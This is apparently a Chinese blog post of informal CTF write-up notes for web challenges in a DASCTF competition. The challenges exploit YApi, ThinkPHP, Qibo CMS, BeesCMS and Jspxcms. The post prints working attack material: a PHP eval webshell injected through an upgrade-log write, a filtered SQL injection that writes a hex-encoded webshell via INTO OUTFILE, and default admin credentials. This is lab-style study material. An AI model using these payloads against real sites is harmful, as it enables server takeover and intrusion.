人在南京,闲着没事干,随便搞搞 edu src,想弄个证书来着,然后顺便看了看最近的比赛,真是脱离 CTF 太久了,因为和巅峰极客冲了,所以这个也不是 wp 就随便记录一下比赛时候的东西,难度还好😅

DASCTF 放到 BUU 的好处就在于可以赛后继续开靶机复现,赵总 YYDS😅


看了看几个师傅博客里的面经记录,感受就一个:我现在的知识储备和技能水平就是个废物😅


1.ezrce:

前一阵子曝出来的 YApi 接口管理平台的RCE 漏洞,网上的 exp 直接就可以打

参考链接:

2.easythinkphp:

比赛的时候没看,其实这个也一样,之前曝出来的 ThinkPHP3.2.x RCE 的漏洞

日志这东西泄露了挺危险的,尤其是 ThinkPHP 日志的路径大家都清楚,模块调用都是死的,无非就是改个时间

最后就是把 shell 写进日志然后菜刀连接,蚁剑行不通

参考链接:

3.cat flag:

这题 MD 绝了,交智商税

几分钟找到了 /etc/nginx/nginx.conf 和 /var/log/nginx/access.log,看见了 flag 最后的路径 /this_is_final_flag_e2a457126032b42d.php ,结果跑偏了,花了好久才绕过来,是我不配,太菜了😅

<?php

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
    {
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

可能大多数人都去绕 escapeshellarg($cmd),但是这东西无解啊,底下的命令执行用单引号拼接,没办法的,网上搜的注入绕过都废掉了,而且这代码在 PHP 手册里有,安全的很

所以最后重点在于如何绕过 preg_match('/flag/i'),那怎么办呢,先是常用的不可见字符,然后又试了各种各样的编码,都不行,我都开始以为自己智商出了问题,结果氼🐎的最后用 url 编码表试了一遍,什么 %b0 %c0 直接绕,淦

4.ez_website:

又是 CMS 代码审计,放 Hint 的时候给了源码,所以还好

直接弱口令 admin/admin888 进后台 /admin.php/admin/index/login.html,到了后台基本上就是能传文件就传文件,能写🐎就写🐎,方便 getshell

和 admin 相关的源码直接拖进 Seay 自动审

可以看 phpinfo() 可惜没什么用,重点放在 Upgrade.php 里,但是这软件审出来的着实用处不大😅

网上其实可以搜到相关漏洞复现文章,有个反序列化 RCE 的,但是没成功,咱也不知道什么情况,挺懵的(齐博建站系统x1.0代码审计)

后来又看了看,在 Upgrade.php 里有个升级后写入文件的操作

...
if( file_put_contents(config('client_upgrade_edition'), '<?php return ["md5"=>"'.$upgrade_edition.'","time"=>"'.date('Y-m-d H:i').'",];') ){
            return true;
        }else{
            return '权限不足,日志写入失败';
        }
...

这么随意的🐎,直接拼接写上去了,而且本地看一下,写入的是个 .php 文件,再往回看一下,在 sysup() 里调用的

$result = $this->writelog($upgrade_edition); 

所以只要把前面 md5 部分闭合,后面写 shell,再注释掉时间那部分就可以,但是试过以后不行,后来看了一下 Y4tacker 师傅的 wp,但还是没明白为什么这么写 shell

",""=>-eval($_POST['shell'])-",];?>//

直接蚁剑连

5.cybercms:

进后台,登陆那里存在单引号闭合注入

直接告诉有 5 列同时根据 bees_admin 知道框架为 beescms,直接搜注入的洞,SQL 注入写一句话进去然后 getshell

可以手工 fuzz 一下,然后常用的方法直接绕过

admin'/**/union/**/selselectect/**/1,2,3,4,0x3c3f70687020406576616c28245f504f53545b7368656c6c5d293b3f3e/**/into/**/ououtfiletfile/**/'/var/www/html/shell.php'/**/#

蚁剑连,根目录 flag.txt

看了一下,有 www.zip 应该是通过这个搜集信息?

6.jspxcms:

这个洞感觉都好早了

参考文章:

主页面登陆那里可以 admin/空,然后切到 /cmscp/index.do 下进后台

然后按步骤复现就行了😅

上传上去然后解压

冰蝎一连直接完事


其他的上难度的等直播讲解吧😅,那个 camera 属实没看懂😅


0 条评论

发表评论

邮箱地址不会被公开。 必填项已用*标注